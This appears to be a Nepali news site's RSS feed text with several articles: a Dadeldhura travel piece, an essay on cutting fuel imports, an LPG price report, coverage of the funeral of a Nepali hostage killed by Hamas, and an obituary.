अजयमेरुमा रहेका तीन नाउलामध्ये दुई नाउलाको भग्नावशेष मात्र छन । एक नाउला पानी खान प्रयोग भइरहेको छ । ढुंगे देवल र नाउलामा कुँदिएका कलात्मक मूर्तीले प्राचीन वास्तुकला झल्काउँछ । अजमेरुकोटको मुख्य दरबार भएको स्थान तल गाडदेखि माथि कोट भएको स्थानमा पुग्न २० मिनेट उकालो यात्रा गर्नु पर्दछ । कोट भएको डाँडामाथि दरबार र राजाका भाइभारदार बस्ने हवेली भग्नावशेषका रुपमा देखिन्छन । दरबारको संरचना सबै भत्केको अवस्थामा छ । अजयमेरु कोट पुरातत्व विभागले उत्खनन सुरु गरेपछि कत्युरीकालीन उत्कृष्ट कलाशैली बाहिर आएको छ । अजयमेरु कोट भनिए पनि कोट मात्रै नभएर दरबारका भग्नावशेषहरू, डबलीहरू, सुरक्षा गर्न बनाइएका टावरहरू, रानी गुफा, कुवाहरू राजदरबारसँग सम्बन्धित थुप्रै संरचनाहरू उत्खनन गरेको स्थानमा रहेका छन । अजयमेरु कोटमा आजभोलि ऐतिहासिक वा कलात्मक वस्तुहरू हेर्नको लागि पर्यटकहरू पुग्ने गर्दछन । प्राचीन अजयमेरु कोटलाई विश्व सम्पदा सूचीमा राख्न पर्दछ भन्ने इतिहासकारहरूले बताएका छन ।
डडेलधुरा पुगेपछि पर्यटक पुग्नै पर्ने स्थान हो उग्रतारा मन्दिर । उग्रतारा मन्दिर अमरगढी नगरपालिकामा पर्दछ । उग्रतारा भगवती मन्दिर प्यागोडा शैलीमा निर्मित छ । यो मन्दिर डडेलधुरा–बैतडी राजमार्गको पश्चिम पट्टीको रमणिय फाटमा रहेको छ । उग्रतारा भगवतीको उत्पत्ती किसानले हलो जोत्दा भएको मानिन्छ । धार्मिक विश्वास अनुसार हलोको फाली सिलामा गढेर सिलाबाट निरन्तर रगतको धारा बग्दा खोला बग्न शुरु भयो । हाल पनि यो खोला यहि मन्दिरका तलन्वाखोलाको नामले चिनिन्छ । उग्रतारालाई नीलसरस्वतीका रुपमा पनि मान्ने गरिन्छ । उग्रताराको पूजा वैदिक र तान्त्रिक दुवैविधिद्वारा गरिन्छ । उग्रतारा भगवती शीलाका रुपमा उत्पन्न भएको मानिन्छ । उग्रताराको शिला गर्भगृहमा स्थापित छ । कुनै पनि दिन यी देवीलाई अपुज अर्थात अर्चनाविहीन बनाउनु हुँदैन भन्ने मान्यता रहेको छ । उग्रतारा मन्दिरमा साँकीजातका क्षेत्रीय मुख्य पुजारी र ३ थरी भट्ट र १ पन्त थरीका छुट्टाछट्टै ४ व्राह्मणलाई सहायक पुजारी तोकिएको छ । यहाँबाट देखिने कश्यप, अपि, सैपाल हिमालको दृश्यावलोकन र डाँडाबाट देखिने प्राकृतिक सुन्दरताले पर्यटकहरूलाई लोभ्याइ दिन्छ । उग्रतारा मन्दिरमा बडा दशैंको महाअष्ठमीमा मेला लाग्ने गर्दछ ।
डडेलधुरामा सांस्कृतिक पर्वमा गौरा प्रमुख पर्व हो । गौरा पर्व सुदूरपश्चिमकै साझा पर्व भए पनि डडेलधुराको रौनक र आत्मीयता बेग्लै देखिन्छ । कतिपय पर्यटकहरू गौरा पर्वकै लागि डडेलधुरा पुग्ने गर्दछन । गौराका लागि परदेशिएकाहरू पनि घर फर्कन्छन, अनि गाउँ र बस्ती देउडाले गुञ्जिन्छ । गौरा पर्व भाद्र कृष्ण पञ्चमीमा घरमा भिजाइएको बिरुडा गहुँ, केराउ, गहत, मास र गुराँस सप्तमीमा मन्दिर लगेपछि पर्व सुरु हुन्छ । व्रतालुले शिव पार्वती स्वरुप गौरा महेश्वरको पूजा गर्दै व्रत बस्छन, मनोकामना पूरा हुने र घरमा सुख सौभाग्य आउने विश्वास गर्दछन । बिशेष गरी बजार वरपरका कारीगाउँ, सेलागाउँ, जीलोडा, हतर्क, मौराडा, जैसेरामा देउडा हेर्नकै लागि पर्यटक जम्मा हुन्छन । पूजापछि बाजागाजासहित देउडा, चैत, हुडकेउली, धमारी चल्छ । एकातिर केटा, अर्कातिर केटी तालमा ताल, पाइलामा पाइला मिलाउँदै दोहोरीमा सवाल जवाफ चल्दा पर्यटकहरूलाई रात बितेको पत्तै हुँदैन । यही मौलिक लय नै सुदूरपश्चिमको पहिचान हो, पाहुनाका लागि नौलो र रमाइलो अनुभव ।
पर्यटनका लागि डडेलधुरा प्राकृतिक, सांस्कृतिक, धार्मिक र ऐतिहासिक रुपमा समृद्ध छ । पर्यटकहरूले आफ्नो यात्राको समय बढाउन सके अमरगढी किल्ला, अजयमेरुकोट, उग्रतारा मात्र होइन डडेलधुरामा घटालबाबा, समैजी, आलिताल, परशुराम धाम, गन्यापधुरा, भागेश्वर, डागेश्वरी, नवदुर्गा, सहस्रलिंगलगायतका सम्पदाहरूमा पनि पर्यटकहरू पुग्न सक्दछन । पछिल्लो समय डडेलधुरा पर्यटनको लागि पूर्वाधारको बिकास हुँदै गएको छ । स्थानीयले डडेलधुरालाई भारतको नैनीतालसँग तुलना गर्छन । किनभने डडेलधुरा गर्मी छल्न मिल्ने हावापानी र प्राकृतिक सौन्दर्यले भरिएको छ ।
कसरी पुग्ने डडेलधुरा ?
डडेलधुरा जान कैलालीको अत्तरिया अथवा महेन्द्रनगरदेखि दैजी–जोगबुढा सडक हुँदै बुडर भएर पनि डडेलधुरा सदरमुकाम पुग्न सकिन्छ । दैजी हुँदै जोगबुढामा जादा महाकाली किनारामा रहेको परशुराम धामसँगै महाभारत पर्वतमाथि रहेको प्रसिद्ध आलीतालको आनन्दलिंदै डडेलधुरासम्म पुग्न सकिन्छ । अर्कोतर्फ मध्यपहाडी लोकमार्ग भएर सुर्खेत, अछाम र डोटी भएर पनि डडेलधुरा पुग्न सकिन्छ । तर पनि पुरानो सडक भनेको अत्तरिया–डडेलधुरा नै हो । अत्तरिया चोकवाट डडलेधुरा बजारको दुरी ११५ कि.मि.पर्दछ । डडेलधुरा जाँदा गोदावरीको समेत पर्यटकहरूले अवलोकन गर्न सक्दछन । अत्तरिया चोकदेखि बसमा चार घण्टाको यात्रामा डडेलधुराको सदरमुकाममा पुग्न सकिन्छ ।
(लेखक : लमजुङ जन्म थलो भई दाङलाई कर्मथलोका रुपमा रोज्नु भई लामो समयदेखि पत्रकारितामा सक्रीय रहनु भएका उहाँ नेपालको पर्यटनका बारेमा विशेष दखल राख्दै कलम चलाउने गर्नु हुन्छ । – सं.)
]]>https://www.antaranganews.com/?feed=rss2&p=498550तेल बचाउन आवश्यक तर कसरी ?
https://www.antaranganews.com/?p=48922
https://www.antaranganews.com/?p=48922#respondSat, 23 May 2026 00:24:10 +0000https://www.antaranganews.com/?p=48922पेट्रोलियम पदार्थबाट चल्ने मोटरसाइकल र गाडीहरूलाई विद्युतीयमा गाडीमा परिणत गर्न सकिने र गर्न थालिएको समेत जानकारी पाइयो । तर परिवर्तन गर्दा त नयांँ किन्दा लाग्ने जस्तै खर्च देखियो । यो योजना त्यति उपयोगी नहुन सक्छ । पेट्रोलियम पदार्थ किन्दा विदेशमा नै पैसा जान्छ । त्यसैले त्यो पैसा रोक्नको लागि घाटामा यी वस्तु उपलब्ध गराउनु वा कर कम गर्नु सधैं उपयुक्त नहुन सक्छ । यो कार्यले करबाट गर्न सकिने आवश्यक कार्यहरूमा असर पर्न सक्छ । अर्कोतर्फ जति सस्तो भयो त्यति नै ग्राहकले ज्यादा किन्नु स्वभाविक हो । त्यसैले विशेषत पेट्रोलियम पदार्थको मुल्य घाटा खाएर घटाउने र बेच्ने कार्य अनुचित पनि हुन सक्छ । बरु महंगो हुंदा कम प्रयोग गर्ने बाध्याताले गर्दा विदेशी मुद्रा भने केही हदसम्म पनि पनि बचत हुन्छ । यद्यपि यो कार्य गर्दा नागरिकको सहमति परोक्ष रुपमा भने पनि लिनु राम्रो हो । त्यसको राम्रो माध्यम सञ्चार नै हुन सक्छ ।
अहिलेको अवस्था मात्र होइन, पछि पनि आफ्नो देशमा नपाइने हुंदा पेट्रोलियम पदार्थको कम प्रयोग र विकल्पका बारे ध्यान दिन आवश्यक छ ।
प्रथमतः मोटरसाइकल चलाउने कार्यलाई निरुत्साहित गर्न आवश्यक छ तर त्यो रोकेर होइन । अहिले सय सिसिको मोटरसाइकलले नयांँ हुंँदा राम्रो सडक भएमा प्रति लिटर ७० किलोमिटरसम्म माइलेज दिने गर्छ । अहिलेको हिसावमा ७० किलोमिटरको पेटेलको मुल्य करिव २२० हुन्छ । यो रकमवाट दुई जना मानिस जान सक्छन् । अर्थात ७० किलोमिटरको यात्रामा एक व्यक्तिको लागि ११० खर्च हुन्छ । सत्तरी किलोमिटरको लागि सार्वजनिक सवारी साधनले करिव २५० रुपैयासम्म लिन्छन् । यसरी सामान्य बाइकमा जांदा हुने खर्च भन्दा डिजेलबाट चल्ने सार्वजनिक सवारी साधनको लागि भाडा ज्यादा पर्ने देखिन्छ । गाडीमा यात्रु पुरा हुंदा कमसेकम मोटरसाइकलको यात्रा भन्दा सार्वजनिक गाडीको यात्र सस्तो हुन पर्छ किनकि, सानो सवारी साधनको खर्च ज्यादा हुने गर्छ र पेट्रोलको खर्च डिजेलको भन्दा ज्यादा हुने गर्छ । यसरी मोटरसाइकलमा भन्दा ठूला सवारी साधनमा ज्यादा भाडा लाग्नु एकहदसम्म अनुचित हो ।
यसको मुख्य कारणमा यात्रु कम भए पनि चलाउने र गलत प्रतिस्पर्धा हुन् । भाडा ज्यादा लाग्नुको कारण गाडीका एभरेज प्यासेन्जरको अनुपातको हिसाब नै हो । यसलाई व्यवस्थित गर्न सकिन्छ । सडकमा विशेषत ज्यादा गाडी चल्ने स्थानमा पहिला छुटेको गाडी अर्को गाडी नआएसम्म रोक्ने र अर्को गाडी आएपछि दोश्रो गाडीमा रहेका यात्रुहरू अगाडीको गाडीमा जान चाहेमा गाडीहरू बिच व्यवस्थित समझदारी हुने गरेर जान दिने प्रष्ट व्यवस्था हुन सक्छ । यसले गर्दा गाडीहरू पूर्ण भारमा चल्न सक्छन् । यसले गर्दा यात्रा छिटो हुन्छ र कम यात्रु लिएर जाने अवस्था नियन्त्रित हुन्छ । जस्तै दोश्रो गाडीले आफू पुगेको ठाउँबाट सबै यात्रु पहिलो गाडीलाई दिंदा त्यो गाडी पनि अर्को गाडी नआउंदासम्म बस्न सक्छ । अर्को गाडी आएमा त्यसका यात्रु लिएर जान सक्छ । यदाकदा सञ्चारको माध्यमबाट विविध सहयोग हुन सक्छ ।
बिशेष अवस्थामा यात्रुबाहक बाहेकका अन्य गाडीहरूबाट पनि सुरक्षित रुपमा यात्रुलाई लग्न सकिने भएमा लग्न दिनु उपयुक्त हुन्छ । त्यो कार्य ट्यांकर, ट्क आदिबाट हुन सक्छ । बिचौलियाहरूले ज्यादा रकम लिएर त्यसको असर यात्रुहरू र गाडीवालालाई परेको छ भने त्यो पनि निराकरण गर्न तयार हुनै पर्छ । यी कार्यहरू गरेमा गाडी भाडा कम गर्न समेत सकिन्छ । गाडी भाडा कम गरेमा पेट्रोलको मुल्य ज्यादा हुंदा मानिसहरू सार्वजनिक यातायातमा नै चढ्ने संभावना हुन्छ । यो समयमा सरकारी तलब खाने कर्मचारीहरूलाई यातायातका साधनहरू र यातायातको लागि इन्धन नदिने बरु दिन पर्ने स्थानमा न्युनतम भाडा दिन सकिन्छ । यी समेत केही विकल्पहरूको प्रयोगले यही अवस्थामा पनि भाडा बढाउने होइन बरु घटाउन सकिन्छ । वाइकहरू कम चल्ने वातावरण भएमा र यात्रुहरूको पहिलो छनौट सार्वजनिक यातायात भएमा यात्रुहरू बढ्छन् । अन्यथा बाइकको यात्रा भन्दा सार्वजनिक गाडीको यात्रा महंगो भएपछि वाइक चढ्नु स्वभाविक देखिन्छ । त्यसैले यात्रु बढाउने र त्यसको लागि कठोर नै बनेर भाडा घटाउन सक्नु पर्छ । यो विशेष अवस्थामा निजी गाडीहरूलाई हतोत्साहित गर्न पनि सक्छि । पेट्रोल डिजेलवाट चल्ने निजी गाडीहरू चलाउंदा अतिरिक्त कर लिने व्यवस्था पनि विकल्प हुन सक्छ ।
अर्को विकल्प त इलेक्ट्कि सवारी साधन नै हो । मोटरसाइकलाई अस्थायी रुपमा नै भने पनि विस्थापित गर्ने उपाय महंगो इलोक्ट्रिक गाडी भने हुन सक्दैन । करिव ३५ किलोमिटरसम्मको यात्रा गर्नेहरूको संख्या हरेक दिन आधा जस्तो रहने गर्दछ । यो संख्यालाई मोटरसाइकल र अन्य साना सवारी साधनहरूबाट अलग गर्नको लागि महंगा इवाइक र इगाडीहरू विकल्प होइनन् । सामान्य मध्यमवर्गको लागि भारतीय सामान्य जोगाडमा आधारित रहेर गरिएका कार्यको अनुभवलाई ध्यान दिन सक्नु पर्छ । करिव १२ हजार नेपाली रुपैया पर्ने भारतीय साइकलहरूमा इलेक्ट्रिक मोटर राख्नाले त्यो साइकलको मुल्य करिव २५ हजार रुपैयासम्म हुन सक्छ । खर्च कम लाग्छ । यसमा राम्रोसंग मर्मतको ब्यवस्था हुने र व्याट्रीको उचित प्रवन्ध हुने हो भने विद्यतीय साइकल राम्रो इन्धन बचतको विकल्प बन्न सक्छ । यो माध्यमबाट देशमा करिव ५० प्रतिशत बाहिरबाट आउने इन्धनलाई रोक्न सकिन्छ । यसको लागि राज्यले भारतमा भए पनि ती साइकलहरु बनाउने र व्याट्री प्रयोग गर्ने बारे तालिमको लागि उचित प्रवन्ध गर्न सक्छ । भारत र चीनबाट सस्ता तर बलिया सामान्य अर्थात रफ टप साइकलहरू खरिद गर्ने व्यवस्था गर्न सक्छ । राज्यबाट काम ढिलो र भ्रष्टाचार हुने नै गरेकोले यसमा नागरिकहरूलाई र विदेशी कम्पनीहरूलाई नै प्रयोग गर्न सक्छ । सञ्चारको बर्तमान अवस्थाामा त्यसको लागि कतै जानै पदैैन । सञ्चार माध्यमहरूबाटै यही बसेर सबै कार्यहरू गर्न सकिन्छ ।
सरकारले ज्यादा समय खर्च नगरी र कर्म खर्च वा यथार्थमा नगन्य खर्चमा नै यो कार्य गर्न सक्छ । यी सामान्य व्यवस्थापनले मात्र पनि देशले विदेशबाट ल्याउने इन्धनलाई आधामा झार्न सकिन्छ । कतिपय कृषि कार्यमा परम्परागत गोरु तथा रांगा समेतको प्रयोगलाई आधुनिक प्रविधिसंग जोडेर गर्न सकिन्छ । जोत्ने तथा सामान ढुवानी समेतमा फरक शैली आउन सक्छन् । सम्भवत कृषि सामग्रीहरू नजिक लग्ने समेतका कार्यमा गोरु घोडा तथा रांगाहरूलाई प्रयोग गर्न सकिन्छ । सम्भवतः उकालो र हिलोमा यन्त्र चलाउने र समथर र ओरालो बाटोमा जनावरको शक्ति नै प्रयोग गर्ने प्रविधिकाबारेमा समेत सोच्न पर्ने बेला आएको छ । पेट्रोलियम पदार्थको प्रयोग प्रदुषण, गर्मी समेत धेरै विकृतीहरूको कारण बनेकोमा कुनै दुविधा पनि छैन ।
त्यस्तै नागरिकलाई बाल्न मिल्ने दाउरा आदि बाल्न प्रोत्साहित गर्ने, धुवा कम हुने, विजुलीबाट सानो पंखा लगाएर बाल्नको लागि प्रयत्न गरिरहन नपर्ने चुलाहरूको प्रचार गर्ने जस्ता कार्य हुन आवश्यक छ । त्यस्तै जंगलमा पातहरू झर्छन् । ती झरेका पातहरूलाई मेसिनबाट दाउरा जस्तो बनाउन सकिने रहेछ । त्यस्ता मेसिनहरू प्रचारमा आएका छन् र ती सस्ता र सामान्य छन् । तिनको प्रयोग गरेर दाउरा बनाउनाले जंगलको सुरक्षा र आगोबाट हुने क्षति कम हुन्छन् । होटल, होस्टल, क्यान्टिन, सेना, प्रहरी तथा धेरै मानिसहरूले नियमित खाना खाने स्थानमा ती प्रयोग हुन सक्छन् । सोलार र व्याट्रीको प्रयोग सस्तो बनाएमा मोटरवाट पानी निकाल्ने र साना कृषि कार्य पनि गर्न सकिन्छ । यसबाट विदेशमा पैसा जानबाट रोक्न सकिन्छ । पर्यावरण राम्रो हुन्छ । स्वदेशी बस्तुको सदुपयोग हुन्छ । वन जोगिन्छ ।
कठोर भएर भन्नै पर्छ कि बाइकलाई हतोत्साहित गर्नै पर्ने देखिएको छ । सवारी साधनहरूमा युवाहरूको मृत्युको मुख्य कारण वाइक नै देखिन्छ । विद्युत साइकल ज्यादा प्राप्त हुने हो र स्पिड ३० किलोमिटर प्रतिधन्टा भन्दा ज्यादा नराख्ने हो तथा मुल्य सस्तो गरेर आवश्यकता अनुसार राज्यले नै केही अनुदान दिने हो भने तराईदेखि पहाड र हिमालसम्म सडक भएको स्थानमा विद्युत साइकलमात्र चलाउने व्यवस्था गर्न सकिन्छ । टाढाको यात्रामा सस्तो भाडामा सार्वजनिक गाडी पाउने र सस्तोमा नै भाडामा अन्यत्र विद्युतीय साइकल पाइने परिपाटीको विकास हुने हो भने बाइकलाई धेरै नै हतोत्साहित गर्न सकिन्छ । विद्युत स्टोभको प्रयोगलाई पनि सबैको पहुंचमा ल्याउने र राज्यले केही भने पनि रकम दिने हो भने ग्यासको प्रयोग समेत कम हुन्छ । राज्यले सबै नागरिकलाई विद्युत चुलो केही सहुलियतमा दिन सक्ने हो र ग्यास सिलिन्डरमा कुनै प्रकारले छुट दिने अर्थात लागत मुल्य भन्दा कममा नबेच्ने हो भने पनि राज्यले आफ्नो कार्यको जस्टिफिकेसन स्वदेशी विद्युत प्रयोगलाई प्रोत्साहित गर्न भनेर दिन सक्छ र नागरिकहरू पनि त्यसमा सहयोगी हुन आवश्यक छ । अहिले साना आकारमा समेत गोबर ग्यास बनाउने प्लास्टिकका ट्यांकीहरू बनेका भारतमा पनि देखिएका छन् । ती ट्यांकीहरूको प्रयोग साह्रै सस्तो हुने र ती गोवर ग्यास प्लान्टहरू शहरी क्षेत्रमा पनि बनाउन सकिने देखिएको छ । यो विद्युतीय चुलो र ग्यासबाट खाना बनाउने बानी पार्ने अवसर पनि हो । ती नेपालमा पनि बन्न सक्छन् । यी सवै कार्य साथमा हुने हो भने देशमा बाहिरी इन्धनको खर्च आधा भन्दा कम हुन सक्छ । साथै यो राज्यलाई सकारात्मक कार्य गर्ने सुअवसर पनि हुन सक्छ ।
फोटो : एजेन्सी ।
]]>https://www.antaranganews.com/?feed=rss2&p=489220बढ्यो खाना पकाउने एलपी ग्यासको मूल्य : विद्युतीय चुल्होप्रतिको आकर्षण बढ्दै
https://www.antaranganews.com/?p=48526
https://www.antaranganews.com/?p=48526#respondFri, 01 May 2026 00:44:47 +0000https://www.antaranganews.com/?p=48526काठमाडौं– नेपाल आयल निगमले खाना पकाउने एलपी ग्यासको मूल्य बढाएको छ । निगमले आज राति १२ बजेबाट खाना पकाउने ग्यासको मूल्य २ हजार १ सय ६० रुपैयाँ कायम गरेको प्रेस विज्ञप्ति जारी गर्दै निगमले वैशाख १७ गते जनाएको हो ।
निगमले पेट्रोल, मट्टितेल र डिजेलको मूल्य भने घटेको विज्ञप्तिमा उल्लेख गरेको छ ।
समायोजनपछि अब खाना पकाउने एलपी ग्यासको मूल्य १४.२ केजीलाई २१६० रुपैयाँ पर्ने निगमले जनाएको छ । निगमका अनुसार अब ७.१ केजी (आधा सिलिन्डर) को १०८० पर्नेछ ।
यसअघि पूरा सिलिण्डर ग्यासको मूल्य २ हजार १० कायम थियो भने आधा सिलिण्डरको १ हजार ५ रुपैयाँ कायम थियो ।
एलपी ग्यासको मूल्य बढेसँगै विद्युतीय चुल्होप्रति उपभोक्ताको आकर्षण बढ्ने भएको आंकलन गरिएको छ । मुलुकमा उत्पादिन विद्युतको खपतका लागि पनि विद्युतीय चुल्होको प्रयोग जरुरी देखिन्छ ।
यसैबीच, निगमले पेट्रोल र डिजेलको मूल्य भने घटाएको छ । निगमले पेट्रोलमा प्रतिलिटर २ रुपैयाँ, डिजेल र मट्टितेलमा प्रतिलिटर १२ रुपैयाँ घटाइएको जनाएको छ ।
यसैगरी, हवाई इन्धन आन्तरिकतर्फ प्रतिलिटर ७ रुपैयाँ र हवाई इन्धन अन्तर्राष्ट्रियतर्फ अमेरिकी डलर ४६ ले बढाइएको विज्ञप्तिमा उल्लेख छ ।
समायोजनपछि पेट्रोलको मूल्य प्रतिलिटर क्रमशः पहिलो वर्गमा २१४.५०, दोस्रो वर्गमा २१६ र तेस्रो वर्गमा २१७ रुपैयाँ कायम गरिएको छ । डिजेल र मट्टितेलको मूल्य प्रतिलिटर पहिलो वर्गमा २२२.५० दोस्रो वर्गमा २२४ र तेस्रो वर्गमा २२५ पुगेको छ ।
]]>https://www.antaranganews.com/?feed=rss2&p=485260विपीन जोशी सबै नेपाली आमाको छोरा : प्रधानमन्त्री कार्की
https://www.antaranganews.com/?p=36132
https://www.antaranganews.com/?p=36132#respondTue, 21 Oct 2025 12:46:57 +0000https://www.antaranganews.com/?p=36132काठमाडौं– प्रधानमन्त्री सुशीला कार्कीले इजरायल–हमास युद्धका क्रममा नेपाली युवाहरूले भोग्नुपरेको दुःख र संघर्ष अनुभव गर्न नसकिने बताउनु भएको छ । प्रधानमन्त्री कार्कीले प्यालेस्टिन कट्टरपन्थी समूह हमासले बन्धक बनाउँदा मारिएका युवा विपीन जोशीको पार्थिव शरीरमा श्रद्धाञ्जली व्यक्त गर्दै कार्तिक ३ गते बताउनु भएको हो ।
प्रधानमन्त्री कार्कीले विपीन जोशी सबै नेपाली आमाहरूको छोरा भएको उल्लेख गर्दै उसलाई बिर्सिन नसकिने बताउनु भयो । उहाँले भन्नुभयो, ‘नेपाली युवाहरूले त्यहाँ अपहरणमा पर्दा र युद्धमा पर्दा कति दुःख र कष्ट भोगे होलान् । त्यो कुरा हामी अनुभव गर्न सक्दैनौँ । एउटा नेपाली छोरा हामी सबै आमाहरूको छोरा हो । अब कसैले पनि विपीनलाई बिर्सिन सक्दैन ।’
अध्ययनको सिलसिलामा इजरायल पुगेका कञ्चनपुरका विपीनलाई गत २०२३ अक्टोबर ७ मा हमासले किबुत्ज क्षेत्रमा गरेको आक्रमणको क्रममा बन्धक बनाइएका थिए । त्यसपछि उनको अवस्था अज्ञात रहेकोमा गत असोज २७ गते इजरायली अधिकारीहरूले उनको मृत्यु पुष्टि गरेका थिए ।
इजरायल र हमासबीच युद्धविराम सम्झौतापछि बन्दी साटासाट गर्ने क्रममा हमासले इजरायली सेनालाई विपीनको शव हस्तान्तरण गरेको थियो ।
आज बिहान विपीनको शवयात्रा पश्चात महाकाली नदी किनारमा दाहसंस्कार गरिएको हो । हिजो साँझ भीमदत्त नगरपालिका– ३ स्थित निवासमा जोशीको शव पु¥याइएको थियो । विपीनको शवलाई सशस्त्र प्रहरी बल नेपालको एक टुकुडीले सलामी अर्पण गरेको जिल्ला प्रहरी कार्यालय कञ्चनपुरका प्रहरी नायव उपरीक्षक सागर बोहराले जानकारी दिनुभयो ।
महाकाली नदीको किनारमा प्रमुख जिल्ला अधिकारी लक्ष्मण ढकालले विपिनको शवमा नेपालको राष्ट्रिय झण्डा ओढाएका थिए । सशस्त्र प्रहरीको टोलीले सलामी दिएर अन्तिम श्रद्धाञ्जली अर्पण गरेको थियो ।
विपिनको पार्थिव शरीर राष्ट्रिय सम्मानका साथ अन्त्येष्टि गरिएको थियो, इजरायली राजदूत समुलिक एरी बास र स्थानीय सहभागी भए । शवयात्रामा स्थानीय तहका जनप्रतिनिधि, प्रशासनिक निकाय र सुरक्षा निकायका पदाधिकारीका साथै सयौँ स्थानीयवासी सहभागी थिए ।
अर्न एण्ड लर्न कार्यक्रमका दौरान विपिन जोशी सेप्टेम्बरमा २०२३ मा इजरायल गएका थिए । इजरायल पुगेको एक महिनामै २०२३ अक्टुबर ७ मा हमासले किबुत्ज क्षेत्रमा गरेको आक्रमण गर्दा विपिन जोशी पनि बन्धक बनाइएका थिए ।
हमासले असोज २७ गते जीवित २० बन्धकहरू इजरायलललाई हस्तान्तरण गरेको थियो । हमासको नियन्त्रणमा ४८ बन्धक भएको ठानिएको थियो । तीमध्ये जीवित २० र मृत २६ जनाको सूची इजरायललाई उपलब्ध गराएको थियो ।
तर विपिन जोशी र अर्का एक इजरायलीको नाम दुइटै सूचीमा थिएन । त्यसपछि इजरेली सेनाले इजरेलस्थित नेपाली राजदूत र जोशीका आफन्तलाई ‘उनी जीवित रहेको कुनै प्रमाण फेला नपरेको र शव पनि नभेटिएको’ जानकारी दिएको थियो ।
असोज २८ गते भने इजरायली सेनाले विपिन जिवित नरहेको जनाएको थियो । सोही दिन राति हमास समूहले रेडक्रम मार्फत विपिनको शव इजरायललाई हस्तान्तरण गरेको थियो ।
दुईवर्षदेखि हमासको नियन्त्रणमा रहेका विपीनको सोही अवधिमा मृत्यु भएको थियो ।
हमासको आक्रमणमा परी विपीनसँगै सुदूरपश्चिमका आठ विद्यार्थीले ज्यान गुमाएका थिए । कृषि विज्ञानतर्फ स्नातक तहको अध्ययनका सिलसिलामा उनीहरू दुई वर्षअघि इजरायल गएका थिए । पुष्पाको साहस :
दाजुको खोजी गरिदिन र हमास समूहमाथि दवाव बढाउन उनकी बहिनी पुष्पा आमासंगै साउन २७ गते इजरायल पुगिन् । त्यहाँबाट फर्केर पुनः उनी अमेरिकासम्म पुगिन् । पुष्पा र उनकी आमा अमेरिकामै हुँदा इजरायरल र हमास समुहवीच युद्धविराम भएको थियो ।
गहभरी आँशु पोख्दै पुष्पाले भनिन्, ‘युद्धविरामपछि दाजु फर्कनेमा हामी ढुक्क थियौं, दाजुलाई देख्न पाइने खुशी अघिल्लो दिन राति निन्द्रनै परेन, तर दोश्रो दिन बिहानै अप्रत्यासित खबर सुन्नु पर्यो, हामीलाई सम्हालिनै गाह्रो भो ! आमा वेहोस नै हुनुभयो, आफै सम्हालिन नसक्ने अवस्थामा रहेकी म, जसो तसो मन थामेर आमालाई सम्हाल्दै भारी मन बनाएर नेपाल फर्कन बाध्य भयौं ।’
पुष्पा र उनकी आमा पद्मा जोशी असोज ३० गते मात्र अमेरिकाबाट नेपाल फर्कका हुन् ।
तिहारको मुखमा सबैका दाजु बहिनी घरमा जम्मा हुने क्रम बढेपछि आफूलाई सम्हाल्नै मुस्किल भइरहेको पुष्पा बताउँछिन् । ‘घरमा लगाएका मखमली फूलले मलाईनै जिस्काए जस्तो लाग्यो, पुष्पाले भनिन्, ‘ती फूलमा दाजुको अनुहार देख्न थाले, अनि घर वरिपरी लगाएका फूल उखेलेर फाले ।’
स्थानीयको अनुसार पुष्पा लक्ष्मीपूजाका दिन दाइको शव घरमा पुगेपछि उनी अचेत भएकी थिइन् । घरी–घरी वेहोस हुने पुष्पालाई सम्हाल्नै गाह्रो भएको स्थानीय सुनिता रोकायाले बताइन् । ‘तिहारको मुखमा हाम्रै अगाडी हुर्केको खेलेको छोराको शव देख्दा गाउँदै शोकाकुल छ ।’ गाउँलेहरू भन्छन् ।
आज मात्रै नेपाल ल्याइएको विपिनको शवमा अन्तरिम सरकारका प्रधानमन्त्री शुशीला कार्की लगायत मन्त्रीले माल्यार्पण गरेर त्रिभुवन पिमानस्थलमै श्रद्धाञ्जली अर्पण गरेका थिए ।
त्रिभुवन मिानस्थलबाट नेपाली सेनाको स्काई ट्रक मार्फत धनगढी ल्याएइएको वश राति नै विपिनको घरमा पुर्याइएको थियो ।
]]>https://www.antaranganews.com/?feed=rss2&p=361320समाजसेवी कोमल अधिकारीको ८२ वर्षमा आफ्नै निवासमा निधन
https://www.antaranganews.com/?p=30744
https://www.antaranganews.com/?p=30744#respondSun, 23 Mar 2025 01:34:13 +0000https://www.antaranganews.com/?p=30744पुनर्वास(कञ्चनपुर)– समाजसेवी कोमल अधिकारीको निधन भएको छ । पछिल्ला दशकमा कञ्चनपुर जिल्लाको पुनर्वास नगरपालिका– ४ को घ गाउँमा स्थायी बसोबार गर्नु भएका अधिकारीको चैत ९ गते साँझ निधन भएको हो ।
लमजुङको ऐतिहासिक थलो दुराडाँडा स्थित तत्कालीन चन्द्रश्वर गाविस– २ मा जन्म थलो रही करिब ३५ वर्ष सोही थलोमा बिताउनु भएको थियो । दुराडाँडामा रहदा पेशाले शिक्षक समेत रहनु भएका उहाँ कञ्चनपुरमा बसाई सरेपछि शिक्षण कार्य छाडेर समाजसेवामा लाग्नु भएको थियो । कञ्चनपुर गएपछि पनि ६६ वर्षको उमेरसम्म जन्मथलोमा बराबर आउने जाने गर्नु भएता पनि त्यसपछि पूर्णरुपमा बसाइँ सरेपछि भने उहाँको जन्मस्थल आवागमन कम भएको थियो । उहाँको सक्रियता एवम् नेतृत्वमा कञ्चनपुर जिल्लाको पुनर्वास नगरपालिका– ४ को घ गाउँ क्षेत्रमा विकासका विभिन्न कार्य भएका छन् ।
पछिल्ला दिनमा उहाँ श्वासप्रश्वास सम्बन्धि समस्याबाट पीडित हुनुहुन्थ्यो । चिक्रित्सकको निगरानी एवम् सल्लाहमा उहाँको उपचार घरमै चलिरहेको थियो ।
स्व. देव शर्मा अधिकारी दम्पतीका जेठा छोरा उहाँका दुई भाइ प्रवीण र महेन्द्रको यसअघि नै निधन भइसकेको छ । स्वर्गीय अधिकारीका दुई छोरा, पाँच छोरीका साथै १७ जना नातिनातिना तथा एक एक जना पलाती र पलातिनी छन् ।
]]>https://www.antaranganews.com/?feed=rss2&p=307440बाल सुधार गृहमा भएको झडपमा चार दर्जन बढी घाइते, स्थिति नियन्त्रणमा
https://www.antaranganews.com/?p=30547
